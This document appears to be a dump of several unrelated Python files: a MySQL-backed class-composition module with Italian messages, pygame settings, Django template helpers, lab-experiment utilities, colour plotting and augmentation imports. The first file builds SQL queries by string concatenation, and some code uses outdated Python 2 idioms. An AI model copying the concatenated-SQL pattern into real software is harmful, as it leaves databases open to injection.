# print(f'Inserting container {container.containerid} with ids {container_ids}')
for student_id in container_ids:
query = "INSERT INTO classi_composte (`groupid`, `configid`, `studentid`, `classid`) VALUES (" + str(self.group_id) + ", " + str(self.config_id) + ", " + str(student_id) + ", " + str(container.containerid) + ")"
cursor.execute(query)
connection.commit()
cursor.close()
connection.close()
def is_already_generated(self):
connection = mysql.connector.connect(
user=DBConfig.user,
password=DBConfig.password,
host=DBConfig.host,
database=DBConfig.database)
cursor = connection.cursor()
query = "SELECT COUNT(*) FROM classi_composte WHERE groupid = " + self.group_id + " AND configid = " + self.config_id
cursor.execute(query)
num_of_students_already_inserted = cursor.fetchall()[0][0]
cursor.close()
connection.close()
return num_of_students_already_inserted > 0
def create_cc_instance(process_id, group_id, config_id):
cc = CC(process_id, group_id, config_id)
result_value = cc.run()
if result_value == True:
good_status_json = {
"querystatus" : "good",
"message" : "Composizione Classi completata!"
}
return json.dumps(good_status_json)
elif result_value == "ZeroStudentsIntoGroup":
bad_status_json = {
"querystatus" : "bad",
"message" : "Gruppo vuoto, non e' possibile generare alcuna configurazione!"
}
return json.dumps(bad_status_json)
elif result_value == "CCAlreadyGenerated":
bad_status_json = {
"querystatus" : "bad",
"message" : "Composizione Classi già generata per questo gruppo e configurazione!"
}
return json.dumps(bad_status_json)
elif result_value == "NoGroupOrConfigSelected":
bad_status_json = {
"querystatus" : "bad",
"message" : "Nessun gruppo e/o configurazione selezionato/a!"
}
return json.dumps(bad_status_json)
elif result_value == "CannotShuffleStudents":
bad_status_json = {
"querystatus" : "bad",
"message" : "Impossibile distribuire gli studenti con questa configurazione!"
}
return json.dumps(bad_status_json)
elif result_value == "TooManySexPrioritizedPeople":
bad_status_json = {
"querystatus" : "bad",
"message" : "Troppi utenti con priorità di sesso per questa richiesta!"
}
return json.dumps(bad_status_json)
elif result_value == "StudentsNotInsertedAfterShuffling":
bad_status_json = {
"querystatus" : "bad",
"message" : "Inserimento degli studenti tramite shuffling non possibile!"
}
return json.dumps(bad_status_json)
elif result_value == "CannotBalanceClassesByMininumValue":
bad_status_json = {
"querystatus" : "bad",
"message" : "Non è possibile bilanciare classi con un numero minimo di studenti così alto!"
}
return json.dumps(bad_status_json)
else:
bad_status_json = {
"querystatus" : "bad",
"message" : "Errore nella Composizione Classi! Contattare l'amministratore."
}
return json.dumps(bad_status_json)
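# Illustrative usage sketch (not part of the original module); the ids below
# are placeholders. create_cc_instance returns a JSON string containing a
# "querystatus" of "good" or "bad" plus a human-readable "message".
#
#     result = json.loads(create_cc_instance(process_id=1, group_id='12',
#                                            config_id='3'))
#     if result['querystatus'] == 'good':
#         print(result['message'])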
|
the-stack_0_6487 | import json
from enum import Enum
from json.decoder import JSONDecodeError
import pygame
from lib import constants
_filePath = constants.res_loc() + "config.json"
_values = {}
class EntryType(Enum):
# lambda for converting key values to strings
Key = (0, lambda value: pygame.key.name(value).capitalize())
Toggle = (1, str)
Scroll = (2, str)
def __init__(self, index, func):
self._value_ = index
self.func = func
class Entries(Enum):
"""
    Enumeration of all possible settings with its default value
"""
KeyLeft = ("Move left", pygame.K_a, EntryType.Key)
KeyRight = ("Move right", pygame.K_d, EntryType.Key)
KeySpace = ("Jump", pygame.K_SPACE, EntryType.Key)
ShowDebug = ("Debug mode", False, EntryType.Toggle)
MusicVolume = ("Music volume", 1.0, EntryType.Scroll)
SoundVolume = ("Sound volume", 1.0, EntryType.Scroll)
def __init__(self, desc, default, entryType):
self.desc = desc
self.default = default
self.entryType = entryType
def getCurrentValue(self):
return _values[self.name]
def setCurrentValue(self, value):
global _values
_values[self.name] = value
def __str__(self):
return self.entryType.func(self.getCurrentValue())
def init():
loadConfig()
def resetConfig():
global _values
_values.clear()
for entry in Entries:
_values[entry.name] = entry.default
def loadConfig():
global _values
try:
with open(_filePath, "r") as file:
_values = json.load(file)
resolveComplete()
except (FileNotFoundError, JSONDecodeError):
resetConfig()
saveConfig()
def saveConfig():
with open(_filePath, "w") as file:
json.dump(_values, file, indent=4)
def resolveComplete():
global _values
update = False
for entry in Entries:
if entry.name not in _values:
update = True
_values[entry.name] = entry.default
if update:
saveConfig()
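# Illustrative usage sketch (assumed calling code, not part of this module):
#
#     init()                                          # load or create config.json
#     jump_key = Entries.KeySpace.getCurrentValue()   # pygame key code
#     Entries.MusicVolume.setCurrentValue(0.5)
#     saveConfig()                                    # persist the change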
|
the-stack_0_6489 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from django.forms.widgets import flatatt
from django.template import Variable, VariableDoesNotExist
from django.template.base import FilterExpression, kwarg_re, TemplateSyntaxError
from .text import text_value
# RegEx for quoted string
QUOTED_STRING = re.compile(r'^["\'](?P<noquotes>.+)["\']$')
def handle_var(value, context):
"""
Handle template tag variable
"""
# Resolve FilterExpression and Variable immediately
if isinstance(value, FilterExpression) or isinstance(value, Variable):
return value.resolve(context)
# Return quoted strings unquoted
# http://djangosnippets.org/snippets/886
stringval = QUOTED_STRING.search(value)
if stringval:
return stringval.group('noquotes')
# Resolve variable or return string value
try:
return Variable(value).resolve(context)
except VariableDoesNotExist:
return value
def parse_token_contents(parser, token):
"""
Parse template tag contents
"""
bits = token.split_contents()
tag = bits.pop(0)
args = []
kwargs = {}
asvar = None
if len(bits) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len(bits):
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError(
'Malformed arguments to tag "{}"'.format(tag))
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter(value)
else:
args.append(parser.compile_filter(value))
return {
'tag': tag,
'args': args,
'kwargs': kwargs,
'asvar': asvar,
}
def split_css_classes(css_classes):
"""
Turn string into a list of CSS classes
"""
classes_list = text_value(css_classes).split(' ')
return [c for c in classes_list if c]
def add_css_class(css_classes, css_class, prepend=False):
"""
Add a CSS class to a string of CSS classes
"""
classes_list = split_css_classes(css_classes)
classes_to_add = [c for c in split_css_classes(css_class)
if c not in classes_list]
if prepend:
classes_list = classes_to_add + classes_list
else:
classes_list += classes_to_add
return ' '.join(classes_list)
def remove_css_class(css_classes, css_class):
"""
Remove a CSS class from a string of CSS classes
"""
remove = set(split_css_classes(css_class))
classes_list = [c for c in split_css_classes(css_classes)
if c not in remove]
return ' '.join(classes_list)
def render_link_tag(url, rel='stylesheet', media=None):
"""
Build a link tag
"""
attrs = {
'href': url,
'rel': rel,
}
if media:
attrs['media'] = media
return render_tag('link', attrs=attrs, close=False)
def render_tag(tag, attrs=None, content=None, close=True):
"""
Render a HTML tag
"""
builder = '<{tag}{attrs}>{content}'
if content or close:
builder += '</{tag}>'
return builder.format(
tag=tag,
attrs=flatatt(attrs) if attrs else '',
content=text_value(content),
)
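# Hedged usage sketch (added for illustration; not in the original module). Because
# `text_value` is a relative import, these helpers are meant to be called from within
# the package rather than by running this file directly:
#
#     classes = add_css_class("btn", "btn btn-primary")   # -> "btn btn-primary"
#     classes = remove_css_class(classes, "btn")          # -> "btn-primary"
#     render_tag("span", attrs={"class": classes}, content="Hi")
#     # -> '<span class="btn-primary">Hi</span>'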
|
the-stack_0_6491 | import wave
import sys
import struct
import time
import subprocess
# import inspect
import threading
import traceback
import shlex
import os
import string
import random
import datetime as dt
import numpy as np
import scipy as sp
import scipy.special
from contextlib import closing
from argparse import ArgumentParser
# for allowing the logging module to send emails through gmail
# import logging
import logging.handlers
try:
import simplejson as json
except ImportError:
import json
# class TlsSMTPHandler(logging.handlers.SMTPHandler):
# def emit(self, record):
# """
# Emit a record.
#
# Format the record and send it to the specified addressees.
# """
# try:
# import smtplib
# import string # for tls add this line
# try:
# from email.utils import formatdate
# except ImportError:
# formatdate = self.date_time
# port = self.mailport
# if not port:
# port = smtplib.SMTP_PORT
# smtp = smtplib.SMTP(self.mailhost, port)
# msg = self.format(record)
# msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
# self.fromaddr,
# string.join(self.toaddrs, ","),
# self.getSubject(record),
# formatdate(), msg)
# if self.username:
# smtp.ehlo() # for tls add this line
# smtp.starttls() # for tls add this line
# smtp.ehlo() # for tls add this line
# smtp.login(self.username, self.password)
# smtp.sendmail(self.fromaddr, self.toaddrs, msg)
# print Exception
# smtp.quit()
# except (KeyboardInterrupt, SystemExit):
# raise
# except:
# print("error failed to send")
# self.handleError(record)
class NumpyAwareJSONEncoder(json.JSONEncoder):
""" this json encoder converts numpy arrays to lists so that json can write them.
example usage:
>>> import numpy as np
>>> dict_to_save = {'array': np.zeros((5,))}
>>> json.dumps(dict_to_save,
cls=NumpyAwareJSONEncoder
)
'{"array": [0.0, 0.0, 0.0, 0.0, 0.0]}'
"""
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
# consider importing this from python-neo
class Event(object):
"""docstring for Event"""
def __init__(self, event_time=None, duration=None, label='', name=None, description=None, file_origin=None, *args,
**kwargs):
super(Event, self).__init__()
self.time = event_time
self.duration = duration
self.label = label
self.name = name
self.description = description
self.file_origin = file_origin
self.annotations = {}
self.annotate(**kwargs)
def annotate(self, **kwargs):
self.annotations.update(kwargs)
class Stimulus(Event):
"""docstring for Stimulus"""
def __init__(self, *args, **kwargs):
super(Stimulus, self).__init__(*args, **kwargs)
if self.label == '':
self.label = 'stimulus'
class AuditoryStimulus(Stimulus):
"""docstring for AuditoryStimulus"""
def __init__(self, *args, **kwargs):
super(AuditoryStimulus, self).__init__(*args, **kwargs)
if self.label == '':
self.label = 'auditory_stimulus'
def run_state_machine(start_in='pre', error_state=None, error_callback=None, **state_functions):
"""runs a state machine defined by the keyword arguments
>>> def run_start():
>>> print "in 'run_start'"
>>> return 'next'
>>> def run_next():
>>> print "in 'run_next'"
>>> return None
>>> run_state_machine(start_in='start',
>>> start=run_start,
>>> next=run_next)
in 'run_start'
in 'run_next'
None
"""
# make sure the start state has a function to run
assert (start_in in state_functions.keys())
# make sure all of the arguments passed in are callable
for func in state_functions.values():
assert hasattr(func, '__call__')
state = start_in
while state is not None:
try:
state = state_functions[state]()
except Exception as e:
if error_callback:
error_callback(e)
raise
else:
raise
# state = error_state # 3/12/19 (AR) not sure what the point of this statement is
class Trial(Event):
"""docstring for Trial"""
def __init__(self,
index=None,
type_='normal',
class_=None,
*args, **kwargs):
super(Trial, self).__init__(*args, **kwargs)
self.label = 'trial'
self.session = None
self.index = index
self.type_ = type_
self.stimulus = None
self.class_ = class_
self.response = None
self.correct = None
self.rt = None
self.reward = False
self.punish = False
self.events = []
self.stim_event = None
class Command(object):
"""
Enables to run subprocess commands in a different thread with TIMEOUT option.
via https://gist.github.com/kirpit/1306188
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
if isinstance(command, str):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
""" Run a command then return: (status, output, error). """
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
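# Hedged usage sketch (illustrative, not part of the original file): run a shell
# command with a timeout; the child process is terminated if it does not finish.
#
#     status, output, error = Command('ls -l /tmp').run(timeout=5)
#     status, output, error = Command('sleep 30').run(timeout=1)   # terminated after 1s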
def parse_commandline(arg_str=sys.argv[1:]):
""" parse command line arguments
note: optparse is depreciated w/ v2.7 in favor of argparse
"""
parser = ArgumentParser()
parser.add_argument('-B', '--box',
action='store', type=int, dest='box', required=False,
help='(int) box identifier')
parser.add_argument('-S', '--subject',
action='store', type=str, dest='subj', required=False,
help='subject ID and folder name')
parser.add_argument('-c', '--config',
action='store', type=str, dest='config_file', default='config.json', required=True,
help='configuration file [default: %(default)s]')
args = parser.parse_args(arg_str)
return vars(args)
def check_cmdline_params(parameters, cmd_line):
    # if someone is using red bands they should amend the checks I perform here
allchars = string.maketrans('', '')
nodigs = allchars.translate(allchars, string.digits)
if not ('box' not in cmd_line or cmd_line['box'] == int(
parameters['panel_name'].encode('ascii', 'ignore').translate(allchars, nodigs))):
print("box number doesn't match config and command line")
return False
if not ('subj' not in cmd_line or
int(cmd_line['subj'].encode('ascii', 'ignore').translate(allchars, nodigs)) == int(
parameters['subject'].encode('ascii', 'ignore').translate(allchars, nodigs))):
print("subject number doesn't match config and command line")
return False
return True
def time_in_range(start, end, x):
"""Return true if x is in the range [start, end]"""
if start <= end:
return start <= x <= end
else:
return start <= x or x <= end
def is_day(city='Boston', lat='42.41', lon='-71.13'):
# def is_day((latitude, longitude) = ('32.82', '-117.14')):
# latitude='42.41', longitude='-71.13' for Medford, MA
# #Tuples not supported in Python 3, rewrote to separate tuples as this function is only called
# without parameters anyway (1/17/18 AR)
"""Is it daytime?
parameter: city, valid entries are large world cities (best option is to select your nearest large city
alternative is lat and lon of current location
Returns True if it is daytime
* Discovered by the Germans in 1904, they named it San Diego,
which of course in German means a whale's vagina. (Burgundy, 2004)
"""
import ephem
if city:
# print 'city'
try:
obs = ephem.city(city.capitalize())
except KeyError:
raise NoCityMatchError
except AttributeError:
obs = ephem.city(city.get('city').capitalize()) # 3/12/19 (AR) Does this work? There's no 'get' function
# for a str
elif lat and lon:
# print 'coords'
obs = ephem.Observer()
obs.lat = str(lat)
obs.long = str(lon)
else:
# print 'else'
obs = ephem.city('Boston')
next_sunrise = ephem.localtime(obs.next_rising(ephem.Sun()))
next_sunset = ephem.localtime(obs.next_setting(ephem.Sun()))
return next_sunset < next_sunrise
def check_time(schedule, fmt="%H:%M", **kwargs):
""" Determine whether current time is within $schedule
Primary use: determine whether trials should be done given the current time and light schedule or session schedule
returns Boolean if current time meets schedule
schedule='sun' will change lights according to local sunrise and sunset
schedule=[('07:00','17:00')] will have lights on between 7am and 5pm
    schedule=[('06:00','12:00'),('18:00','23:59')] will have lights on from 6am to noon and from 6pm to midnight
"""
if schedule == 'sun':
if is_day(kwargs):
return True
else:
for epoch in schedule:
            assert len(epoch) == 2
now = dt.datetime.time(dt.datetime.now())
start = dt.datetime.time(dt.datetime.strptime(epoch[0], fmt))
end = dt.datetime.time(dt.datetime.strptime(epoch[1], fmt))
if time_in_range(start, end, now):
return True
return False
def check_day(schedule):
""" determine whether trials should be done given the current day
"""
today = dt.datetime.today().weekday()
if schedule == 'weekday':
if today < 5: # .weekday() returns int of day of week, with Monday = 0
return True
else:
return False
elif schedule == 'daily':
return True
else: # Match current day of week to session_days parameter
todayDate = dt.datetime.today()
for eachDay in schedule:
if eachDay == today or eachDay == todayDate.strftime("%A").lower() or \
eachDay == todayDate.strftime("%a").lower():
return True
return False
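# Hedged usage sketch (illustrative, not part of the original file):
#
#     check_time([('07:00', '17:00')])                        # True between 7am and 5pm local time
#     check_time([('06:00', '12:00'), ('18:00', '23:59')])    # two daily windows
#     check_day('weekday')                                    # True Monday through Friday
#     check_day(['mon', 'wednesday', 4])                      # mixed day formats are accepted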
def wait(secs=1.0, final_countdown=0.0, waitfunc=None):
"""Smartly wait for a given time period.
secs -- total time to wait in seconds
final_countdown -- time at end of secs to wait and constantly poll the clock
waitfunc -- optional function to run in a loop during hogCPUperiod
If secs=1.0 and final_countdown=0.2 then for 0.8s python's time.sleep function will be used,
which is not especially precise, but allows the cpu to perform housekeeping. In
the final hogCPUsecs the more precise method of constantly polling the clock
is used for greater precision.
"""
# initial relaxed period, using sleep (better for system resources etc)
if secs > final_countdown:
time.sleep(secs - final_countdown)
secs = final_countdown # only this much is now left
# It's the Final Countdown!!
# hog the cpu, checking time
t0 = time.time()
while (time.time() - t0) < secs:
# let's see if any events were collected in meantime
try:
waitfunc()
except:
pass
def auditory_stim_from_wav(wav):
with closing(wave.open(wav, 'rb')) as wf:
(nchannels, sampwidth, framerate, nframes, comptype, compname) = wf.getparams()
        duration = float(nframes) / framerate  # duration in seconds = frames / frame rate
stim = AuditoryStimulus(time=0.0,
duration=duration,
name=wav,
label='wav',
description='',
file_origin=wav,
annotations={'nchannels': nchannels,
'sampwidth': sampwidth,
'framerate': framerate,
'nframes': nframes,
'comptype': comptype,
'compname': compname,
}
)
return stim
def concat_wav(input_file_list, output_filename='concat.wav'):
""" concat a set of wav files into a single wav file and return the output filename
takes in a tuple list of files and duration of pause after the file
input_file_list = [
('a.wav', 0.1),
('b.wav', 0.09),
('c.wav', 0.0),
]
returns a list of AuditoryStimulus objects
TODO: add checks for sampling rate, number of channels, etc.
"""
cursor = 0
epochs = [] # list of file epochs
audio_data = ''
with closing(wave.open(output_filename, 'wb')) as output:
for input_filename, isi in input_file_list:
# read in the wav file
with closing(wave.open(input_filename, 'rb')) as wav_part:
try:
params = wav_part.getparams()
output.setparams(params)
fs = output.getframerate()
except: # TODO: what was I trying to except here? be more specific
params = []
fs = 1
pass
audio_frames = wav_part.readframes(wav_part.getnframes())
# append the audio data
audio_data += audio_frames
part_start = cursor
part_dur = len(audio_frames) / params[1]
epochs.append(AuditoryStimulus(time=float(part_start) / fs,
duration=float(part_dur) / fs,
name=input_filename,
file_origin=input_filename,
annotations=params,
label='motif'
))
cursor += part_dur # move cursor length of the duration
# add isi
if isi > 0.0:
isi_frames = ''.join([struct.pack('h', fr) for fr in [0] * int(fs * isi)])
audio_data += isi_frames
cursor += len(isi_frames) / params[1]
# concat all of the audio together and write to file
output.writeframes(audio_data)
description = 'concatenated on-the-fly'
concat_wav = AuditoryStimulus(time=0.0,
duration=epochs[-1].time + epochs[-1].duration,
name=output_filename,
label='wav',
description=description,
file_origin=output_filename,
annotations=output.getparams(),
)
return concat_wav, epochs
def get_num_open_fds():
"""
return the number of open file descriptors for current process
.. warning: will only work on UNIX-like os-es.
"""
pid = os.getpid()
procs = subprocess.check_output(
["lsof", '-w', '-Ff', "-p", str(pid)])
nprocs = len(
filter(
lambda s: s and s[0] == 'f' and s[1:].isdigit(),
procs.split('\n'))
)
return nprocs
def rand_from_log_shape_dist(alpha=10):
"""
randomly samples from a distribution between 0 and 1 with pdf shaped like the log function
low probability of getting close to zero, increasing probability going towards 1
alpha determines how sharp the curve is, higher alpha, sharper curve.
"""
beta = (alpha + 1) * np.log(alpha + 1) - alpha
t = random.random()
ret = ((beta * t - 1) / (sp.special.lambertw((beta * t - 1) / np.e)) - 1) / alpha
return max(min(np.real(ret), 1), 0)
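# Hedged usage sketch (illustrative): draw samples and check they stay in [0, 1],
# biased toward 1 for larger alpha.
#
#     samples = [rand_from_log_shape_dist(alpha=10) for _ in range(1000)]
#     assert all(0.0 <= s <= 1.0 for s in samples)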
class NoCityMatchError(Exception):
"""Raised for is_day() when no matching city is found in the ephem module
"""
# print 'No city matches entered text. Try using coords instead (lat=xxx, lon=yyy)'
pass
class VarTypeError(Exception):
"""Raised for is_day() when coords are entered as values
"""
# print 'No city matches entered text. Try using coords instead (lat=xxx, lon=yyy)'
pass
|
the-stack_0_6493 | #! /usr/bin/env python
import sys
import os
from django.conf import settings, global_settings
APP_NAME = 'sitegate'
def main():
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
if not settings.configured:
settings.configure(
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'etc',
APP_NAME,
),
DATABASES={'default': {'ENGINE': 'django.db.backends.sqlite3'}},
MIDDLEWARE_CLASSES=(
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
),
ROOT_URLCONF='sitegate.tests',
MIGRATION_MODULES={
'auth': 'django.contrib.auth.tests.migrations',
},
AUTH_USER_MODEL=os.environ.get('DJANGO_AUTH_USER_MODEL', 'auth.User')
)
try: # Django 1.7 +
from django import setup
setup()
except ImportError:
pass
from django.test.utils import get_runner
runner = get_runner(settings)()
failures = runner.run_tests((APP_NAME,))
sys.exit(failures)
if __name__ == '__main__':
main()
|
the-stack_0_6494 | from .family_methods import trio_matrix, mendel_errors, transmission_disequilibrium_test, de_novo
from .impex import export_elasticsearch, export_gen, export_bgen, export_plink, export_vcf, \
import_locus_intervals, import_bed, import_fam, grep, import_bgen, import_gen, import_table, \
import_plink, read_matrix_table, read_table, get_vcf_metadata, import_vcf, import_gvcfs, \
import_vcfs, index_bgen, import_matrix_table
from .statgen import skat, identity_by_descent, impute_sex, \
genetic_relatedness_matrix, realized_relationship_matrix, pca, \
hwe_normalized_pca, pc_relate, split_multi, filter_alleles, filter_alleles_hts, \
split_multi_hts, balding_nichols_model, ld_prune, row_correlation, ld_matrix, \
linear_mixed_model, linear_regression_rows, logistic_regression_rows, poisson_regression_rows, \
linear_mixed_regression_rows, lambda_gc
from .qc import sample_qc, variant_qc, vep, concordance, nirvana, summarize_variants
from .misc import rename_duplicates, maximal_independent_set, filter_intervals
__all__ = ['trio_matrix',
'linear_mixed_model',
'skat',
'identity_by_descent',
'impute_sex',
'linear_regression_rows',
'logistic_regression_rows',
'poisson_regression_rows',
'linear_mixed_regression_rows',
'lambda_gc',
'sample_qc',
'variant_qc',
'genetic_relatedness_matrix',
'realized_relationship_matrix',
'pca',
'hwe_normalized_pca',
'pc_relate',
'rename_duplicates',
'split_multi',
'split_multi_hts',
'mendel_errors',
'export_elasticsearch',
'export_gen',
'export_bgen',
'export_plink',
'export_vcf',
'vep',
'concordance',
'maximal_independent_set',
'import_locus_intervals',
'import_bed',
'import_fam',
'import_matrix_table',
'nirvana',
'transmission_disequilibrium_test',
'grep',
'import_bgen',
'import_gen',
'import_table',
'import_plink',
'read_matrix_table',
'read_table',
'get_vcf_metadata',
'import_vcf',
'import_vcfs',
'import_gvcfs',
'index_bgen',
'balding_nichols_model',
'ld_prune',
'filter_intervals',
'de_novo',
'filter_alleles',
'filter_alleles_hts',
'summarize_variants',
'row_correlation',
'ld_matrix'
]
|
the-stack_0_6497 | # Copyright 2018 Jose Cambronero and Phillip Stanley-Marbell
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
# ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
from colormath.color_objects import sRGBColor, XYZColor
from colormath.color_conversions import convert_color
from colorsys import hsv_to_rgb
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
import numpy as np
def color_pairs_plot(*args, **kwargs):
"""
Plot swatches of color
:param args: separate rgb channels, 2 lists of rgb tuples, or a list of tuples of rgb tuples
:param kwargs: groups (in order to plot multiple columns of swatchs)
:return:
"""
if len(args) == 6:
return _color_pairs_plot_rgb(*args, **kwargs)
elif len(args) == 2:
return _color_pairs_plot_sep(*args, **kwargs)
else:
return _color_pairs_plot_tupled(*args, **kwargs)
def _color_pairs_plot_rgb(r1, g1, b1, r2, g2, b2, **kwargs):
return _color_pairs_plot_sep(zip(r1, g1, b1), zip(r2, g2, b2), **kwargs)
def _color_pairs_plot_sep(color1, color2, **kwargs):
return _color_pairs_plot_tupled(zip(color1, color2), **kwargs)
def _color_pairs_plot_tupled(rgb_pairs, **kwargs):
groups = kwargs.get('groups', 1)
normalize = kwargs.get('normalize', False)
# check if we should still normalize values
if not normalize:
normalize = max([v > 1 for color1, color2 in rgb_pairs for v in list(color1) + list(color2)])
nrows = len(rgb_pairs)
pairs_per_group = nrows / groups
if 'ax' in kwargs:
ax = kwargs['ax']
fig = ax.get_figure()
else:
fig, ax = plt.subplots()
# dimension info
bbox = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
width, height = bbox.width, bbox.height
X = width * fig.get_dpi()
Y = height * fig.get_dpi()
# space between swatches: arbitrary
swatch_space = 60
# make groups distinguishable
group_space = 0.5 * swatch_space
# we can define X = group_space * (groups - 1) + (swatch_space + 2 * swatch_width) * groups
swatch_width = (X - group_space * (groups - 1) - swatch_space * groups) / (2 * groups)
# offset between groups must consider swatch space etc
group_offset = 2 * swatch_width + swatch_space + group_space
# swatch height
h = Y / (pairs_per_group + 1)
for i, pair in enumerate(rgb_pairs):
# location for this pair on y axis
y = Y - (h * (i % pairs_per_group)) - h
# horizontal offset multipler based on group
group_id = i / pairs_per_group
for j, color in enumerate(pair):
# normalize rgb color to 0.0 to 1.0
if normalize:
color = [ channel / 255.0 for channel in color ]
# left/right swatch
is_second = j % 2
# starting point for this group
xmin = group_id * group_offset
# if it is the second swatch, we move a bit to the right
xmin += is_second * (swatch_width + swatch_space)
# max is simply the swatch width added to the start of the swatch
xmax = xmin + swatch_width
ax.hlines(y=y + h * 0.1, xmin= xmin, xmax=xmax, color=color, linewidth=h * 0.6)
# add an arrow
if j == 0:
ax.arrow(xmax + 10, y + h * 0.1, swatch_space * 0.5, 0, head_width = 8, width = 4, shape = 'full')
ax.set_axis_off()
return ax
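# Hedged usage sketch (illustrative, not part of the original file): plot three
# before/after color pairs given as 0-255 RGB tuples (values above 1 trigger the
# built-in normalization).
#
#     pairs = [((255, 0, 0), (200, 50, 50)),
#              ((0, 255, 0), (60, 200, 60)),
#              ((0, 0, 255), (70, 70, 220))]
#     ax = color_pairs_plot(pairs)
#     plt.show()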
def smash(x, min_v = 0.0, max_v = 1.0):
if x < min_v:
return min_v
elif x > max_v:
return max_v
else:
return x
def plot_along_hue(hues, y, ax = None, normalize = False, **kwargs):
# normalize x coordinates
if normalize or max(map(lambda x: x > 1.0, hues)):
hues = [h / 360.0 for h in hues]
# create "fake" HSV color with full saturation and value, but same hue as point
hsv_colors = [(h, 1, 1) for h in hues]
# convert color to rgb to actually color points in graph
rgb_colors = [hsv_to_rgb(*col) for col in hsv_colors]
# there may be some smudge, so anything outside of range gets put back into range
rgb_colors = [(smash(r), smash(g), smash(b)) for r, g, b in rgb_colors]
if ax is None:
fig, ax = plt.subplots()
ax.scatter(x = hues, y = y, c = rgb_colors, alpha = 1.0, s = 100, **kwargs)
return ax
# plots the spectral locus and then overlays colors as points by projecting into x,y
def chromaticity_scatter(colors, cs = None, marker = '*', converter = lambda x: convert_color(sRGBColor(*x), XYZColor), ax = None, **kwargs):
# plot basic background if not provided
if ax == None:
ax = _spectral_locus()
# convert every color to XYZ
XYZ = map(converter, colors)
# now convert every XYZ to x,y pairs
# check if we can iterate over points
try:
map(lambda x: x, XYZ[0])
except:
XYZ = map(lambda x: x.get_value_tuple(), XYZ)
xyz = [map(lambda x: x / sum(pt), pt) for pt in XYZ]
xs,ys,_ = zip(*xyz)
# create group colors if provided else sets to red
if not cs:
cs = 'red'
cmap = None
else:
cmap = plt.get_cmap('jet', len(cs))
cmap.set_under('gray')
ax.scatter(x = xs, y = ys, s = 100, c = cs, marker = marker, cmap = cmap, **kwargs)
return ax
def _spectral_locus():
# TODO we should just pickle xs, ys below
locus_pts_file = os.path.join(os.path.dirname(__file__), '../resources/spectral-locus.csv')
xs = []
ys = []
for line in open(locus_pts_file, "r"):
_, Xstr, Ystr, Zstr = line.split(",")
# convert from XYZ to x,y
XYZ = [ float(coord) for coord in [Xstr, Ystr, Zstr]]
denom = sum(XYZ)
xs.append(XYZ[0] / denom)
ys.append(XYZ[1] / denom)
fig, ax = plt.subplots()
poly = Polygon(np.array(zip(xs, ys)), fill = False, closed= True)
ax.add_patch(poly)
return ax
def plot_svd(m, xdim = 0, ydim = 1, colors = None, ax = None, title = "SVD plot", pct_var = True):
"""
Compute the SVD of a matrix and plot in 2-d as a scatter plot
:param m: matrix to decompose
:param xdim: vector of U to use as x axis
:param ydim: vector of U to use as y axis
:param colors: optional color mapping for each point
:param ax: optional existing axes
:param title: optional title
:param pct_var: if true returns the % of variance explained by the eigenvalues associated with xdim and ydim
:return: scatter plot and potentially % of variance explained by dimensions used
"""
if xdim < 0 or ydim < 0 or xdim == ydim:
raise ValueError("Must be valid 2-d for plotting")
u, s, v = np.linalg.svd(m)
if colors is None:
cmap = plt.get_cmap('jet')
else:
colors = np.array(colors)
cmap = plt.get_cmap('jet', len(colors))
cmap.set_under('gray')
if ax is None:
ax = plt.subplot()
ax.scatter(x=u[:, 0], y=u[:, 1], c = colors, cmap = cmap, label = "Group %s" )
ax.set_xlabel("U[:][%d]" % xdim)
ax.set_ylabel("U[:][%d]" % ydim)
ax.legend(loc = 'best')
ax.set_title(title)
if pct_var:
return ax, sum(s[[xdim, ydim]]) / sum(s)
else:
return ax
|
the-stack_0_6498 | import sys
sys.path.insert(0, 'augraphy')
import augraphy
import torchvision.transforms as transforms
import random
import torch
import numpy as np
import logging
import cv2
from albumentations import augmentations
from PIL import Image, ImageFilter
from augmixations.blots import HandWrittenBlot
from warp_mls import WarpMLS
logger = logging.getLogger(__name__)
class Paperize(object):
def __init__(self, process_datasets=None, p=0.5):
